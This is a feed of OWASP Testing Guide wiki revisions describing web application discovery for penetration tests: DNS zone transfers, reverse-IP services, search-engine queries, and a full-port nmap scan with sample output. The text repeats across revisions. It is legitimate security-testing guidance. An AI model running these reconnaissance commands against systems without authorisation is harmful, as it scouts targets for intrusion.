www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Owasp-Info.jpg&amp;diff=12424</id>
		<title>File:Owasp-Info.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Owasp-Info.jpg&amp;diff=12424"/>
				<updated>2006-11-13T08:02:45Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Querying webhosting.info WHOIS Service for 216.48.3.18, the address of www.owasp.org, produces three additional symbolic names we might not have been aware of.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Querying webhosting.info WHOIS Service for 216.48.3.18, the address of www.owasp.org, produces three additional symbolic names we might not have been aware of.&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12423</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12423"/>
				<updated>2006-11-13T07:41:41Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12236</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12236"/>
				<updated>2006-11-10T15:18:14Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Gray Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, is given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
